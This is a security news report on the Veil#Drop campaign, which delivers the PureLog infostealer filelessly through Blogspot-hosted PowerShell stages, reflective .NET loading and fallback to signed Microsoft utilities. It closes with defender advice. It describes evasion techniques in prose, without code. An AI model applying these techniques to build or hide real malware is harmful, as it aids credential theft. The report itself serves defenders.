A fileless malware framework has been abusing Google's Blogspot platform to deliver the PureLog Stealer entirely in memory, letting attackers steal credentials while leaving few traces on disk.
Securonix Threat Research, which named the framework Veil#Drop, said the campaign chains together compromised websites, a booby-trapped JavaScript file and PowerShell to reach its target.
PureLog Stealer is a known .NET infostealer, but the multi-stage delivery route is what sets this operation apart.
A Fileless Chain Built to Evade Detection
The attack begun when a victim on a compromised website opened a file masquerading as a document. Because Windows hides known extensions by default, it appeared to be a PDF, but it was actually a script that Windows Script Host runs, launching PowerShell with security checks disabled.
From there, PowerShell fetched its next stages directly from attacker-controlled Blogspot pages and run them in memory, without writing any files to disk.
The firm said hosting the payloads on Google-owned infrastructure let the traffic blend in with normal web activity and slip past reputation-based defenses.
Read more on PureLogs delivery: PureLogs Variant Steals Data via Purchase Order Lures
The later stages hid their contents behind custom XOR encoding and only decoded at runtime. The researchers said the final loader rebuilt two .NET assemblies from encoded data and loaded them straight into memory using reflection, so no executable was ever dropped for antivirus to scan.
To ensure the payload run even when that path is blocked, Veil#Drop falled back on trusted Microsoft-signed binaries or LOLBINs, cycling through utilities such as RegSvcs, InstallUtil and MSBuild until one succeeded.
Because these binaries are legitimate parts of the .NET framework, the activity often slipped past application-control and allowlisting rules.
What PureLog Steals
Once running, PureLog Stealer went beyond simple credential theft, sweeping the machine for browser passwords, cookies, autofill data, cryptocurrency wallets and details of the host itself.
Securonix warned that stolen session cookies can let attackers bypass multi-factor authentication (MFA) by reusing a victim's logged-in session.
"In many cases, the operators behind information-stealing malware sell harvested credentials through underground marketplaces, allowing other threat actors to purchase access to compromised accounts and environments," the company explained.
Securonix also urged defenders to watch for the behavior behind Veil#Drop, such as PowerShell reaching out to Blogspot or spawning .NET utilities, rather than relying solely on static indicators.
